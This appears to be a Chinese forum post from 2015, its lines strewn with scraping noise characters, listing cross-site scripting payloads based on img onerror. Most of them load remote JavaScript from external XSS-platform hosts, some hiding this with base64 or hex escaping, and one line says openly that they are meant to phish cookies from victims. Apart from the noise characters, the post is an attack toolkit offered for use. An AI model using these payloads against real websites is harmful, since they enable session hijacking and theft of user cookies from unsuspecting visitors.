<img src='non-exist.jpg'onerror="alert('xss')">
/ _. \. m4 r/ e( A0 l o4 a<img src=# onerror=alert(123)>& }+ ~" E1 c$ l0 O/ q
<img src=# onerror=alert(document.cookie)> i7 q$ p' }) Z" n+ c' J$ p& W* |" y
下面是利用平台钓cookie的9 S3 Z- n% l' B& d$ H& q% L. D
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>5 f) U; X6 h: C N' r
" {# p# P2 P1 W+ y- r+ W2 }
; \5 T/ v" g" X$ y/ o1 y) e
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
& [1 e L! T/ v$ F: Z, x<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>4 M) n3 N7 w4 v9 t
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>! z5 x3 U P7 R9 c I! i& u
<img src=1 onerror=jQuery.getScript("//xss.re/974")> : w+ F" U2 e8 K# U
<img src="#">
1 t: k- s [2 U$ A- W# s# V<img src="#">- \6 j$ |3 G9 t. C( s4 }
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>+ i/ d- a, O+ T# ~& t+ Y: S
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">( q; O5 J P+ c% d5 G
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>! m5 J1 b8 t: P* T* L% E, ^
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
. ~3 ~) f% y. G( o! E5 D<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
1 C5 S) t: U, F2 ]6 z<img src=x width="0" height="0"></img>" H( y: e* n3 x: E6 Y; H& C$ E9 Q
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
. H- [1 z& N: \) Y$ ]" k1 \<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>( |- ?- a" O, ]7 y
|
发表于 2015-10-18 14:33:54
收藏
支持
反对